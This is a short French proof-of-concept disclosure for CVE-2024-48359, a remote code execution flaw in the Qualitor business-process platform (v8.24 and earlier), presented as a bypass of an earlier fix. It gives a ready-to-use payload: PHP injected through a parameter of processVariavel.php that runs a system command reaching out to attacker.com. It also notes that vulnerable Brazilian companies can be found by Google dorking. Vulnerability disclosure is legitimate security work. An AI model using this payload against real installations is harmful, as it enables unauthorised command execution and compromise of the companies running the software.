
PoC CVE-2024-48359
CVE-2024-48359 | Qualitor <= v8.24 RCE
Qualitor est une plateforme de gestion de processus métier, et ce système est présent dans diverses entreprises au Brésil qui peuvent être identifiées simplement en utilisant Google dorking.
Notre équipe a identifié une vulnérabilité dans l'application susceptible d'entraîner une exécution de code à distance (RCE), permettant l'exécution à distance de commandes système.
Ceci est un contournement du correctif de la CVE-2023-47253.
Envoyez simplement un code PHP dans la page processVariavel.php, ex : /html/ad/adpesquisasql/request/processVariavel.php?gridValoresPopHidden=nl2br(stream_get_contents(popen('ping attacker.com', 'r')));

https://www.linkedin.com/in/xvinicius/
https://www.linkedin.com/in/hairrison-wenning-4631a4124/